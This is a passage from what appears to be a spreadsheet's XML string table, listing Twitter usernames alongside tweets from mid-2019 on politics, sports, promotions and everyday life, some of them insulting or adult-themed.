  <si>
    <t>@HillaryClinton @senatemajldr If we could legislate “crazy” you still wouldn’t be around making demands. We voted for Trump, but you are still here?</t>
  </si>
  <si>
    <t>Hass0804</t>
  </si>
  <si>
    <t>I just earned the 'Verified Adventure (Level 86)' badge on @untappd! https://t.co/rB7l22z5HU</t>
  </si>
  <si>
    <t>Owllane_</t>
  </si>
  <si>
    <t>I've waited so long to post this- but...here's S U P E R TY @iamtyYT (his persona is really nice to draw-) https://t.co/pq80aSEPSM</t>
  </si>
  <si>
    <t>MassArt</t>
  </si>
  <si>
    <t>Live in Northborough, MA? Don't miss your opportunity to view the work of Graphic Design #MassArtAlumni Ralph Caputo! https://t.co/xfmXAUCH3z</t>
  </si>
  <si>
    <t>maria011393</t>
  </si>
  <si>
    <t>Hopefully they don’t steal the quarters out my car lol</t>
  </si>
  <si>
    <t>foramsraqu</t>
  </si>
  <si>
    <t>Wait -- actual question: How did u submit abstracts before the web? Please don't tell me stamps were involved 🤯</t>
  </si>
  <si>
    <t>boltonnut</t>
  </si>
  <si>
    <t>@angelgirl1976 did you do scrambled eggs in the microwave? I've never fixed them in there.</t>
  </si>
  <si>
    <t>trabridgmatweet</t>
  </si>
  <si>
    <t>I've been at the Football Hall Of Fame Balloon Classic this weekend surrounded by beer and people keep on thinking I am legal age lol. I'm barely 17. #wtf #bestcommentevr #HOF2019 #balloonclassicHOF</t>
  </si>
  <si>
    <t>rlanglands1</t>
  </si>
  <si>
    <t>@RitaPanahi Her response was appalling but predictable. And considering the audience and the questioner, even more appalling. She threw the woman under the bus because she knows she can’t say what she believes.</t>
  </si>
  <si>
    <t>SheepDogSociety</t>
  </si>
  <si>
    <t>16 Marines arrested at Camp Pendleton on charges of human smuggling and drug-related offenses https://t.co/w2PiQPVyBN via @amermilnews</t>
  </si>
  <si>
    <t>trinityblacio</t>
  </si>
  <si>
    <t>Good morning, the question of the day: Do you have a garden this year? https://t.co/s9tu3RjOYa</t>
  </si>
  <si>
    <t>aroundaboutbrit</t>
  </si>
  <si>
    <t>Mill Park Caravan &amp; Camping Park is surrounded by mystical woodland &amp; an abundance of wildlife. During your stay you are likely to spot, kingfishers, deer &amp; pheasants. https://t.co/vwArE8uWSZ #Campsite #Camping #Woodland #Wildlife #Devon #Nature #VisitDevon #CaravanSite #Glamping https://t.co/xfqgHRTTb8</t>
  </si>
  <si>
    <t>airborne13f4p</t>
  </si>
  <si>
    <t>@deoliyarajesh @miss9afi @TarekFatah Ask the Islamic extremists about Islamic Abrogation! Problem solved!</t>
  </si>
  <si>
    <t>TeenyTwoTimes</t>
  </si>
  <si>
    <t>https://t.co/2CQRYDrzuT The lovely @Raimireyes_ challenges us all to do some smaller things that might make a big difference to our mama 🌏</t>
  </si>
  <si>
    <t>LeoRosanna</t>
  </si>
  <si>
    <t>@SamJoyceBooks Ask for the special colourful lattes! They're not on the menu because they're "secret!"</t>
  </si>
  <si>
    <t>russwolf44</t>
  </si>
  <si>
    <t>@kaizervonmaanen @bakatzen @zeynab_ah1 @wasifali665 Also, there is non consensus that stoning is permissible. Wahabis who place Hadith over Quran try to promote it, but the Quran does not support stoning, only lashes. These verses are Medinan verses, revealed when the community there was formed and the constitution was created.</t>
  </si>
  <si>
    <t>clccalala</t>
  </si>
  <si>
    <t>@LeaveEUOfficial @Pc_Free_Zone Don't worry about the French They are a mob of pussycats and sneaks(viz Rainbow Warrior) Hitler proved that Aim a field gun at the Arc De Triumph And they go to water But their women are lovely, beautiful, loyal and brave creatures. Vive les belles Francais!</t>
  </si>
  <si>
    <t>easyasomc</t>
  </si>
  <si>
    <t>The #PetShopBoys were pure pop perfection at this stage, weren't they? #TOTP https://t.co/3uqL6Xq4aH</t>
  </si>
  <si>
    <t>YogiSamme</t>
  </si>
  <si>
    <t>Have a great New Moon Black Moon energy and blessings (Black Moon is a term for second New Moon in a month). Goodbye Mercury Retrograde. Thank you July. I feel August will be good, May it be so for us all. Believe in yourself and know thyself. ❤️🙏🌹</t>
  </si>
  <si>
    <t>shilosarah</t>
  </si>
  <si>
    <t>@_Smash__ Just... just wake me up though 😂</t>
  </si>
  <si>
    <t>rendheavens</t>
  </si>
  <si>
    <t>@DestinytoMoon https://t.co/9Fi8e38J9K was a super popular launch character and it took them like 2 years to give her even a map</t>
  </si>
  <si>
    <t>fenrir856</t>
  </si>
  <si>
    <t>@Steele131 I mean outside of movies DC literally crushes Marvel in virtually everything. Comics is the tug of war but I think DC was winning in that too</t>
  </si>
  <si>
    <t>MetsFansUnited1</t>
  </si>
  <si>
    <t>@WilponJeff @michaelgbaron Thanks for the updates Dr. Wilpon. I wont ask about Nimmo, I know it's nothing serious.</t>
  </si>
  <si>
    <t>jamesdraper</t>
  </si>
  <si>
    <t>Not looking forward to the scandal when the first draft of this tweet is leaked to the press: https://t.co/qPUjEbDCcY</t>
  </si>
  <si>
    <t>angel_lovelady</t>
  </si>
  <si>
    <t>@timburchett Time to go on a budget and deal with the waste because I don’t want to have to start putting money in a mattress</t>
  </si>
  <si>
    <t>WildSpiritWolfx</t>
  </si>
  <si>
    <t>@kyleliddell22 I’m living for this content.💜</t>
  </si>
  <si>
    <t>SharkeyTim</t>
  </si>
  <si>
    <t>@realcoolcam101 Seriously? Have you slept through the past two days? 😄</t>
  </si>
  <si>
    <t>Theo_physicist</t>
  </si>
  <si>
    <t>@Tactical_review So the real question is, should any weapons be banned? And do states have standing to limit 2nd A rights? If the answer to either is yes, then which weapons can be limited? No one seems to have an answer. Personally I'm not opposed to back ground checks or mental health reviews.</t>
  </si>
  <si>
    <t>alexandrade368</t>
  </si>
  <si>
    <t>At the point in my life where you don’t have time to do anything 🙃</t>
  </si>
  <si>
    <t>misosoup</t>
  </si>
  <si>
    <t>Saddened by the news of what happened at the Gilroy Garlic Festival in Gilroy, CA this evening. Imagine a world where people didn’t think of mass shootings as ‘just another day in America’.</t>
  </si>
  <si>
    <t>ryanramkelawan</t>
  </si>
  <si>
    <t>@rebeccawriting Rebecca, thank you for writing this book and starting this series! May you rise and celebrate with every entry! And may you have a big fanbase for your work and for your characters. You did it and you deserve the greatest of rewards. Thank you for writing your awesomeness!</t>
  </si>
  <si>
    <t>lilneki</t>
  </si>
  <si>
    <t>Connor whos eyes are dark brown but in the sunlight seem to glow a soft gold around the edges. Somewhere in Hanks brain he hears his old friend say in a memory “Gross! Do you think he’s hot or something?” Hank shakes his thoughts away and turns his attention to the lecture.</t>
  </si>
  <si>
    <t>Chelle_Shocker</t>
  </si>
  <si>
    <t>@daffysirod11 @NBCNewYork Convenient you don't post the MANY pictures of him with Clinton and crew. Keep spreading the false narrative. Clinton's will see a jail cell if not a noose before all this is over.</t>
  </si>
  <si>
    <t>HarryBudisidhar</t>
  </si>
  <si>
    <t>@LindseyGrahamSC @realDonaldTrump What happened to you? Did you ever have honor at all???</t>
  </si>
  <si>
    <t>andronelectron</t>
  </si>
  <si>
    <t>@Spo_okyBaby its just a cover for a nazi parade, call it what it is!</t>
  </si>
  <si>
    <t>navi_stone</t>
  </si>
  <si>
    <t>Sending direct mail to visitors who abandon your website is a new strategy for online marketers who may be used to spending on PPC advertising. So, how does retargeted, personalized postcards stack up against traditional PPC advertising? Check it out https://t.co/pUTcOmmDzO</t>
  </si>
  <si>
    <t>MMJ_Connections</t>
  </si>
  <si>
    <t>Who will be Missouri’s ‘blind scorer’ for marijuana business... https://t.co/elgoKtOl3B https://t.co/49tmY4WBcA</t>
  </si>
  <si>
    <t>Bhilldragon</t>
  </si>
  <si>
    <t>Latest Stats = 3 Followers and 3 Unfollowers (tracked by https://t.co/HUbbV1Td2u)</t>
  </si>
  <si>
    <t>MikeCugnoCBS4</t>
  </si>
  <si>
    <t>Just announced: #FIU and #UCF will play a home-and-home series in football in 2020 and 2022.</t>
  </si>
  <si>
    <t>ashlybthorn</t>
  </si>
  <si>
    <t>I can attest as a witness to this The Devil and his minion hate the Virgin Mary, when you are being attacked by the Devil and his army pray the Hail Mary.</t>
  </si>
  <si>
    <t>crissy_anne_</t>
  </si>
  <si>
    <t>@alizakelly Tooons of my therapy clients have canceled/no showed since the start🙃</t>
  </si>
  <si>
    <t>GemKM</t>
  </si>
  <si>
    <t>Disappointing to lose this one - shame England couldn’t have been competitive until now, they’ve been extremely disappointing until today #ashes #watchme</t>
  </si>
  <si>
    <t>racingwithjudd</t>
  </si>
  <si>
    <t>@dennis_trusty @EddieRoyce23 @PicksByDynasty @thestaggieman I’ll say this the Del Mar 5F was a cool difference for 2 months a year compared to the downhill it made Cali sprinting difficult because thoses are 2 different tracks</t>
  </si>
  <si>
    <t>jeff_pulice</t>
  </si>
  <si>
    <t>@DonaldCalloway And you're a racist, not a comedian, but I'll laugh at you for tweeting this.</t>
  </si>
  <si>
    <t>SoulSilverRose</t>
  </si>
  <si>
    <t>@TheHunterWildTV You're blowing my mind right now 😆 I use to live in Seattle and never saw any of that going on.</t>
  </si>
  <si>
    <t>JDMC54</t>
  </si>
  <si>
    <t>Jeff’s giving away a £2m jackpot if 2m people play for free https://t.co/F21vZdUHSr #JoinJeff #Super6</t>
  </si>
  <si>
    <t>JayMixTheBeat</t>
  </si>
  <si>
    <t>Any Bet plugin, sounds or effects. Mac or Windows. I got you. Don't want to pay that full price at the store or online, hit me up. Still got to pay but not retail prices. https://t.co/TJjygkDWPC</t>
  </si>
  <si>
    <t>FrankBuysPhilly</t>
  </si>
  <si>
    <t>(Mynd Property Management acquires HomeUnion, expands offerings for real estate investors | 2019-07-26) - https://t.co/GGI6tEU3kp https://t.co/l8zKJexWle</t>
  </si>
  <si>
    <t>duelking16</t>
  </si>
  <si>
    <t>@KyoryuZeo93 Ahh the days to where I could run a mile in 9 minutes. How I miss those days</t>
  </si>
  <si>
    <t>mirandacspencer</t>
  </si>
  <si>
    <t>Why Are We Still Looking for Oil and Gas? https://t.co/JDPzfxQ62n</t>
  </si>
  <si>
    <t>PeggyAWheeler</t>
  </si>
  <si>
    <t>Congress finally just fully funded the 9/11 Victim Compensation Fund. Thank you, Jon Stewart. https://t.co/WqXcXXxHKu</t>
  </si>
  <si>
    <t>paulnicholls</t>
  </si>
  <si>
    <t>@AlexandraMH_89 Sorry to hear this Alex. I’m afraid I have literally just agreed to take on a Family Solicitor who starts in September.</t>
  </si>
  <si>
    <t>BCLbusinessTV</t>
  </si>
  <si>
    <t>Business Connections Live TV - live from our studio with another great business guest and Steve Hyland https://t.co/GKt7eFFw64</t>
  </si>
  <si>
    <t>secondeller</t>
  </si>
  <si>
    <t>&amp; the memes/reference that takagi and nishikata were exchanging is a goal</t>
  </si>
  <si>
    <t>SpraytannedPink</t>
  </si>
  <si>
    <t>i came to work at 4 my lunch break was 4:15-4:45. im just ready to go 🗣</t>
  </si>
  <si>
    <t>4tdsbundy</t>
  </si>
  <si>
    <t>@PaulLeeTicks Wow the magats and bots are all in that thread right now.</t>
  </si>
  <si>
    <t>HeatherKlimchuk</t>
  </si>
  <si>
    <t>It was a fantastic evening at President’s Reception for @TasteOfEdm w fabulous MC @SharonMallon790! Thks to leadership from Prez Miles Quon @LemonHeavenYEG &amp; support from the City of Edmonton @Scott_McKeen &amp; province! Thks also @R_Boissonnault! https://t.co/Tw4ph0pvhO</t>
  </si>
  <si>
    <t>DataGolf</t>
  </si>
  <si>
    <t>@mmaze1 Morikawa had special status before the win, which means all his previous points counted. @GeoPBurdell this may have also been the case with Wolff? Although, I don't think it was.</t>
  </si>
  <si>
    <t>positivelysian</t>
  </si>
  <si>
    <t>Exploring the new, beautiful upstairs space at @CafeNucleus in Rochester 🥰♥️☕ #kentblogger https://t.co/5MtIP2TGg8</t>
  </si>
  <si>
    <t>d_brianna_</t>
  </si>
  <si>
    <t>just see me the way I see you. .</t>
  </si>
  <si>
    <t>JeanneBellNP</t>
  </si>
  <si>
    <t>@CurtKlotz @JiaJiang Sone really good stuff out there from @Gallup that adults really need your honest reaction to what they did. You can’t speak for all reactions or “what’s right.”</t>
  </si>
  <si>
    <t>MJWhiteley</t>
  </si>
  <si>
    <t>Anyone know if we accept the WA does that mean we accept the EU offshore tax rules?</t>
  </si>
  <si>
    <t>MiLBMariners</t>
  </si>
  <si>
    <t>Kyle Lewis extends his hitting streak to 7 games as he singles to LF scoring Donnie Walton. Arkansas ties the game at 1 in the 3rd.</t>
  </si>
  <si>
    <t>stokes_jerry</t>
  </si>
  <si>
    <t>@JulieOwenMoylan That's the only conclusion you can draw...</t>
  </si>
  <si>
    <t>Simbra75</t>
  </si>
  <si>
    <t>#CouldNotStopSmiling when I hit the dance floor https://t.co/noYhVgjNDn</t>
  </si>
  <si>
    <t>rlafayette</t>
  </si>
  <si>
    <t>@Nicoxw1 I have to pick Gomer Piles. He was a bit strange.</t>
  </si>
  <si>
    <t>PaulJ2303</t>
  </si>
  <si>
    <t>@xTony_T_x @Rakunvar Do you think if they're not working they might have time to lodge a malicious copyright strike, asking for a friend.</t>
  </si>
  <si>
    <t>PrimaApoth</t>
  </si>
  <si>
    <t>Always forget what you were going to say to your doctor? Try these tips on your next appointment. https://t.co/JTkxrKDe98 healthcare #reform</t>
  </si>
  <si>
    <t>WhatsOnGlasgow</t>
  </si>
  <si>
    <t>The weekly @MerchantSq Craft and Design Fair will move outside onto Bell Street and Candleriggs for the duration of the @MerchCityFest! https://t.co/ojQ13liHBD</t>
  </si>
  <si>
    <t>mrsdabfiire</t>
  </si>
  <si>
    <t>I'm craving chilaquiles and beans 🤤 https://t.co/RqUO3iL3p8</t>
  </si>
  <si>
    <t>xoMonicaaaaa</t>
  </si>
  <si>
    <t>You were too much of a fuck up, so leaving you alone was the only option</t>
  </si>
  <si>
    <t>Adam_Karpiak</t>
  </si>
  <si>
    <t>@HRJazzy @mfaulkner43 @HRecruit It stays in my mustache for the rest of the day 🤷🏻‍♂️</t>
  </si>
  <si>
    <t>rjmsalespro</t>
  </si>
  <si>
    <t>@miqk I've started deleting any connections that pitch me right after connecting. Done with the crap and don't need those type of people in my life.</t>
  </si>
  <si>
    <t>BigMeeze</t>
  </si>
  <si>
    <t>@ChrisBeard7734 Is this a Harold and Kunar reference? Didn’t really watch that movie 😂</t>
  </si>
  <si>
    <t>coreybking</t>
  </si>
  <si>
    <t>@prisssynic75 Indeed! She’s been a force for a long time...you can’t mention 90’s Black cinema, without her name coming up! 😊</t>
  </si>
  <si>
    <t>srasberry1</t>
  </si>
  <si>
    <t>@chrislhayes Stuttering? It's 59 degrees in Powell oh. What the he'll is your point?</t>
  </si>
  <si>
    <t>Seaways_MPSS</t>
  </si>
  <si>
    <t>@natemcdermott @NatashaBertrand @KFILE Liars are welcome as long as they hate Democrats especially Obama. I’m sure she’s a good choice because Trump always picks well. She should get fitted for a jumpsuit.</t>
  </si>
  <si>
    <t>headovmetal</t>
  </si>
  <si>
    <t>Adam Briggle: It’s time for a non-discrimination ordinance https://t.co/RDvZwMtR8h via @DentonRC</t>
  </si>
  <si>
    <t>hannah_would</t>
  </si>
  <si>
    <t>@pipedownmrbrown Ahhh such good news, congrats lovelies! So happy for you ❤️❤️❤️</t>
  </si>
  <si>
    <t>KooiLawIndy</t>
  </si>
  <si>
    <t>What happens when man's best friend attacks someone? It doesn't mean the dog is evil, but the owner does need to be held accountable for any injuries it may have caused. Read more: https://t.co/bMOzQSVapC https://t.co/moIZwkjNbF</t>
  </si>
  <si>
    <t>slik_flame</t>
  </si>
  <si>
    <t>A major new study suggests it’s possible to avoid developing dementia — 5 ways to reduce your risk https://t.co/TPN2SPcxAj</t>
  </si>
  <si>
    <t>mnealo</t>
  </si>
  <si>
    <t>An Unlikely Alliance: Key Figures In The Opportunity Zone Landscape https://t.co/EjYimpfqaW</t>
  </si>
  <si>
    <t>NeilClark66</t>
  </si>
  <si>
    <t>@frances_lilley @jeremycorbyn Absolutely. But Corbyn’s opponents made a noise and the leadership buckled, as they nearly always do.</t>
  </si>
  <si>
    <t>BankrollTHor</t>
  </si>
  <si>
    <t>@awsomoo8000 @macawcaw123 @HeatheredEffect @Twitch Justin tv the glory days lol</t>
  </si>
  <si>
    <t>holidaytots</t>
  </si>
  <si>
    <t>Call for votes 😀 if you think we are worthy, please can you vote for us in the @BritTravAwrds , Best UK Family Holiday Company - would really help a teeny family company like ours 😎 thank you! 🥰https://t.co/ZcozyacZF3</t>
  </si>
  <si>
    <t>jayroshanee</t>
  </si>
  <si>
    <t>a hour until the final btw xx</t>
  </si>
  <si>
    <t>Chris_r_Hunt</t>
  </si>
  <si>
    <t>OutSystems was named to the CRN Mobility 100 and recognized as one of the “15 Coolest Mobile #AppDev Platforms". In addition, @shirifriedman, sr. director of channel marketing was named to “The Most Powerful Women Of The Channel"! https://t.co/jZhycMwzj4</t>
  </si>
  <si>
    <t>RMhoop</t>
  </si>
  <si>
    <t>The Dodgers announced their 50/50 jackpot last night reached $80,000 and that half of it is going to the Tyler Skaggs Baseball Foundation. Classy https://t.co/fTrf7xGRWU</t>
  </si>
  <si>
    <t>LumiereWedding</t>
  </si>
  <si>
    <t>Just born baby! she was born so quickly that the midwives hadn't arrived, so dad was on the phone to emergency services to know what to do. Like my son, she was born in the bath. I was amazed at how mum, dad and baby were chilled, absolutely no stress,… https://t.co/YhlFoMXtDY https://t.co/wsVsmyIhS9</t>
  </si>
  <si>
    <t>kevin_snapp</t>
  </si>
  <si>
    <t>@ahval_en Johnson as PM may be good for Turkey as long as no one mentions goats. I doubt that he will be good for the UK. A carelss jolly bumbler is not what the country needs.</t>
  </si>
  <si>
    <t>iwipemyownasss</t>
  </si>
  <si>
    <t>just got arrested and then unarrested. this cop made me throw my bowl out in front of mary’s kountry kitchen in newport😔</t>
  </si>
  <si>
    <t>JessicaJaster1</t>
  </si>
  <si>
    <t>4 of 5 stars to Magic Steps by Tamora Pierce https://t.co/RVVgeaPTqw</t>
  </si>
  <si>
    <t>maddrus</t>
  </si>
  <si>
    <t>@JohnStossel @RealCandaceO This is the same statist hypocrite who said people who burn their own flags should be STRIPPED of their citizenship. No thanks. To hell with her and anti/freedom jackwads like her.</t>
  </si>
  <si>
    <t>CDP</t>
  </si>
  <si>
    <t>Disturbingly, Brazil’s forest conservation efforts are rapidly moving backwards. Forests are crucial to the climate fight. Companies can do their bit by checking their supply chains and ensuring deforestation is not a part of their business models. https://t.co/uteZQGbCiY</t>
  </si>
  <si>
    <t>ClassyEarlGrey</t>
  </si>
  <si>
    <t>I’ll mow the fields next week now that songbird nesting is wrapping up, and chase voles out of the grass for them. #backyardhabitat #redtailedhawk #snohomishriver #snohomishvalley #pacificnorthwest #raptors https://t.co/C8KbEKysbx</t>
  </si>
  <si>
    <t>HoCoRec</t>
  </si>
  <si>
    <t>Update: Contractors will be back out tomorrow (Friday, July 26) to finish tree removal. As a result, the Centennial East gates will be closed for several hours. Signs will be posted and the gates will re-open once work is completed.</t>
  </si>
  <si>
    <t>maryhar31109354</t>
  </si>
  <si>
    <t>@emarvelous @JoyAnnReid Kamala Harris has earned black vote. Biden is not Obama. What has he specifically done to gain majority black vote. He is not endorsed by Obama. Failed on 3 occasions to win presidential nomination. Is too old and may cause young blacks to stay home.</t>
  </si>
  <si>
    <t>PINsykes</t>
  </si>
  <si>
    <t>@claire_brine @thehighlowshow Oh heaven! Love putting my daughter in my old clothes. And congratulations ✨</t>
  </si>
  <si>
    <t>SUPERDAD_AJJJ</t>
  </si>
  <si>
    <t>I still don’t know how to use Snapchat 😅🤦🏿‍♂️ https://t.co/jmxENiLFL2</t>
  </si>
  <si>
    <t>TisSavannah</t>
  </si>
  <si>
    <t>99% of the men complaining in the hashtag are tr*mp supporters and have maga in their profile somewhere. 🤢🤢</t>
  </si>
  <si>
    <t>plcaplenty</t>
  </si>
  <si>
    <t>NEW Allen-Bradley 1761-L32AWA Ser E FRN 1.0 MicroLogix 1000 Controller PLC NIB https://t.co/3zVieYqnz6 $1,725.00 End Date: Saturday Aug-24-2019 3:00:39 PDT Buy It Now for only: $1,725.00 Buy It Now | Add to watch list</t>
  </si>
  <si>
    <t>ecargaivilo_</t>
  </si>
  <si>
    <t>this is why we stay shopping at American Eagle and Aerie, we love fast shipping and body accepting queens.</t>
  </si>
  <si>
    <t>steenwes</t>
  </si>
  <si>
    <t>@Legopolis A friend does roller derby under the name Stone Cold Jane Austen.</t>
  </si>
  <si>
    <t>MatthewRavenhil</t>
  </si>
  <si>
    <t>@trevorw1953 They are resigning because there is no future for them in the cabinet. This will be the narrowest minded cabinet ever it will not even span opions in the Conservative Party</t>
  </si>
  <si>
    <t>bristierw</t>
  </si>
  <si>
    <t>@gigibihhh I’m like I just seen you post with your girl on a date and I liked it</t>
  </si>
  <si>
    <t>Adinoadonai</t>
  </si>
  <si>
    <t>@SamanthaAngeliq True, the difference is he was popular before, and a billionaire, #GOP had to go with him or risk Dems getting another 8 years, this election is not the case. Btw... I predicted he would win!</t>
  </si>
  <si>
    <t>InVainn</t>
  </si>
  <si>
    <t>It’s 4pm and I haven’t eaten anything, who let me live on my own</t>
  </si>
  <si>
    <t>Teslatunity</t>
  </si>
  <si>
    <t>@justIVfun @TylerH @TeslaPodcast @Tesla A good tint shop will have what I’m talking about and I’ll try to find the name for you to confirm with them</t>
  </si>
  <si>
    <t>testmybackups</t>
  </si>
  <si>
    <t>Protect @vmware vm's the easy way - with CloudBerry Online Backup. #dataprotection #virtualization #vmware #backup #cybersecurity #infosec #VM #infotech https://t.co/VO9Psnv40I https://t.co/XdG3ai2sAx</t>
  </si>
  <si>
    <t>nerdymedzebra</t>
  </si>
  <si>
    <t>I'm making a fb group for Neurodiverse (romantic) relationships. I initially named it Neurodiverse Couples, but realized --- does that make (some?) #Polyamorous people feel excluded or no? Is there any poly-inclusive language I should be aware of so I can include?</t>
  </si>
  <si>
    <t>shannonyates129</t>
  </si>
  <si>
    <t>Just said to Mills it's time to get up, now she's pretending to be asleep and ignoring me everytime I say something to her or try and move her 🙄😭😂</t>
  </si>
  <si>
    <t>ShawnJC_</t>
  </si>
  <si>
    <t>@sweetie_cyanide Outlaw-I think I have you added already but you'll have to teach me cuz I'm really bad</t>
  </si>
  <si>
    <t>noreason21</t>
  </si>
  <si>
    <t>@AWildChappy I challenge you to beat it.</t>
  </si>
  <si>
    <t>edwardgorelik</t>
  </si>
  <si>
    <t>The ridiculousness of this https://t.co/Az3OrHm1eV</t>
  </si>
  <si>
    <t>DavidKotkin1</t>
  </si>
  <si>
    <t>Bionic Triggers In $9.99 Works with all #controllers 🎮. Cannot be used with the #Avengers 🎮. It has a finger 👐 rest that makes it so your #triggers also work the bumpers at the same time. Buy it 🎮 now here 👉 https://t.co/LIDII9PziY #Avenger #Reflex #PS4 #AvengerReflex https://t.co/60b0JZNx1J</t>
  </si>
  <si>
    <t>mannreagan</t>
  </si>
  <si>
    <t>@khaliqrodriquez I’m sorry that there are idiots among us, but always have been/always will be. Rise above it. I get called a racist every day by the media. I just smh and move foward. Good luck in life😘</t>
  </si>
  <si>
    <t>edu_post</t>
  </si>
  <si>
    <t>NAACP: Don’t Make Black Kids the New ‘Cotton’ That Funds Failing Public Schools https://t.co/JblAfsur7j</t>
  </si>
  <si>
    <t>malbert31</t>
  </si>
  <si>
    <t>I just gave to Michael Bennet https://t.co/VAZaBuRi27. We need all voices of reason. I can’t say enough about his book. “The land of Flickering Lights”. It’s sane, honest and a scary look at the inside. McConnell Has to go!</t>
  </si>
  <si>
    <t>spaceqadet5ive</t>
  </si>
  <si>
    <t>Been on my own and I guess that’s the way it’s going stay...</t>
  </si>
  <si>
    <t>F_O_R_E_S_TBOY</t>
  </si>
  <si>
    <t>@nffcalways1 @Schnitzel1972 @blatherskiting @NoSleepForTony Finance is literally free trade with the bloc you tart! Vested interest - you’ve actually nailed EU cooperation! The commissioner required a majority from all MEP’s and if she didn’t get backing, she would have been out.</t>
  </si>
  <si>
    <t>SUNNYDAV</t>
  </si>
  <si>
    <t>No worries I’ve been listening to Spirit since 7 am on repeat in my office.</t>
  </si>
  <si>
    <t>delaskablack</t>
  </si>
  <si>
    <t>@spikedonline @Furedibyte God help them when they have to face the real world! Many of these students wail about the EU! One thing fir sure they would never survive EU army conscription!</t>
  </si>
  <si>
    <t>JoshPColley</t>
  </si>
  <si>
    <t>@callummarkie I mean, this is the current situation in Wales 😉 https://t.co/KVfh3HTrYB</t>
  </si>
  <si>
    <t>crimson_fay</t>
  </si>
  <si>
    <t>The gaze you fall into, that controls your very soul. From the thoughts in your head, the money in your wallet, and the fire of your arousal. All consuming. Awe-inspriring. #findom #femdom https://t.co/UgkqCsIPaJ</t>
  </si>
  <si>
    <t>claws4truth</t>
  </si>
  <si>
    <t>@ChrisMurphyCT Wow I wanna be just like you when I grow up! So very brave</t>
  </si>
  <si>
    <t>PollyThomsonStr</t>
  </si>
  <si>
    <t>Jacksonville has had 10 shootings in a week. Six were fatal. I cannot get used to this.</t>
  </si>
  <si>
    <t>Freedom1776__</t>
  </si>
  <si>
    <t>‘In God We Trust’ to be displayed in all South Dakota public schools https://t.co/dxp6yfHZbv</t>
  </si>
  <si>
    <t>NickPBrown</t>
  </si>
  <si>
    <t>I don’t know what @ricardorossello is thinking delaying this by this long. The longer he delays, the more ravenous and potentially unstable this crowd gets. #RickyRenuncia #PuertoRico</t>
  </si>
  <si>
    <t>mdotnakandakari</t>
  </si>
  <si>
    <t>drop your standards for me</t>
  </si>
  <si>
    <t>Winifre33156792</t>
  </si>
  <si>
    <t>Praise the Return of the Lord | Musical Drama "Every Nation Worships Almighty God" (English Dubbed) #Power #God #Victory #Heaven #Jesus #Love #mercy #Holy #Worship #Christian #Glory @erind90 @YearoutWilliam @GinnyCotton13 @Woodsy_cookie https://t.co/QK1VHEEAJZ</t>
  </si>
  <si>
    <t>TLR0272i</t>
  </si>
  <si>
    <t>@Klez03 @dcfcofficial Your goalkeeper is the only reason it wasn't a heavy loss</t>
  </si>
  <si>
    <t>alyssap_posh</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: White &amp; Silver Bikini top. https://t.co/jLWDcoXWpa via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>EB7</t>
  </si>
  <si>
    <t>@MobileKahl @TrainerLuisCR @TheNathanDC But not at such a huge skill dropoff. When you have a player going 5-10 and the other 21-13 in the tryout and winning more 2v2s with the 2v2 player on the team then there is no excuse for chemistry making up for that.</t>
  </si>
  <si>
    <t>BryanVice2</t>
  </si>
  <si>
    <t>Enter to Win a $50 Amazon Gift Card from @giveawaybandit #giveaway https://t.co/JyoqHmG0zw</t>
  </si>
  <si>
    <t>BarryLButcher</t>
  </si>
  <si>
    <t>@KTHopkins I’m assuming this guy hasn’t got a passport or has never been out of his state and probably used to having no teeth and has no need for them anyway 😂😂😂😂</t>
  </si>
  <si>
    <t>Sunnydejavu1</t>
  </si>
  <si>
    <t>@kbq225 Has twitter blocked your video? I can not get it to start/play?</t>
  </si>
  <si>
    <t>Neo__Spartan</t>
  </si>
  <si>
    <t>Who would be down to have a cod stream team that played gbs/tourneys and just had fun? Competition is fun but I ain't gonna go pro. I'm busy and just thinking bout a chill squad to play whenever they can.</t>
  </si>
  <si>
    <t>BillWalker3rd</t>
  </si>
  <si>
    <t>Being rejected in favor of "exciting" drama and ongoing chaos.... I should be happy. ...I guess.</t>
  </si>
  <si>
    <t>tomasino_d</t>
  </si>
  <si>
    <t>@chyyzzl I was the car</t>
  </si>
  <si>
    <t>bigTvassallo</t>
  </si>
  <si>
    <t>@slwein Ok I can't stop thinking about this. Do they keep the same pillow? Do the pillows move with them? That's the part that really confuses me.</t>
  </si>
  <si>
    <t>JOEZCafe_</t>
  </si>
  <si>
    <t>Important tip for the day kids, check your VR headset before putting it on, otherwise you might end up getting poked in the eye by a spider that was sleeping inside the faceplate.</t>
  </si>
  <si>
    <t>joshroby</t>
  </si>
  <si>
    <t>@AlexHarrowSFF @LUWriters How to balance dialogue and action, or is putting dialogue into the scene a fool's errand in the first place?</t>
  </si>
  <si>
    <t>F1</t>
  </si>
  <si>
    <t>@AmphonPaithoon6 Cars spinning off in the wet, leaders struggling and an unexpected podium... it was all happening at Hockenheim! Reply #OptOut to cancel https://t.co/BeFc1ezTfu</t>
  </si>
  <si>
    <t>lovetheIDOLz</t>
  </si>
  <si>
    <t>@parkbomtootinba he’s tried to apologize on his own but i guess that’s up for debate. sorry this is all a bit of a mess lol</t>
  </si>
  <si>
    <t>disabledsenior</t>
  </si>
  <si>
    <t>Harnessing the power of microbes for mining in space - https://t.co/qOlcbcaUXI</t>
  </si>
  <si>
    <t>TheOutcast118</t>
  </si>
  <si>
    <t>@Gram_Kat @mizzog48 @BossyLadySunday GOOD FOR YOU Luv!! 👊🏽👊🏽✊🏽👍🏽</t>
  </si>
  <si>
    <t>URAC</t>
  </si>
  <si>
    <t>URAC’s new Organizational Management Certification boosts credibility, ensures quality and sets your organization apart from your peers. Learn more: https://t.co/hHibg3ouFf https://t.co/zIPNS4Nvvt</t>
  </si>
  <si>
    <t>Hotwifemwc</t>
  </si>
  <si>
    <t>📷 HotwifeMWC: @Deeva Legends Chronicling Cuckoldress and hubby! https://t.co/7M8cekIQqK</t>
  </si>
  <si>
    <t>donnajones</t>
  </si>
  <si>
    <t>@ianhowes1970 @JeanneBartram Damn thanks, I wish these bloomin stories wouldn’t be spread after the fact! Thank you!</t>
  </si>
  <si>
    <t>ChevroletCanada</t>
  </si>
  <si>
    <t>@LadyAcapella Which team was the first to leave the ‘Nanaimo Bar Drop’ challenge in their 2019 Chevrolet Camaro SS? #AmazingRaceCanada #TheChevroletRace Reply #stop to unsubscribe.</t>
  </si>
  <si>
    <t>KaisNaughtyGirl</t>
  </si>
  <si>
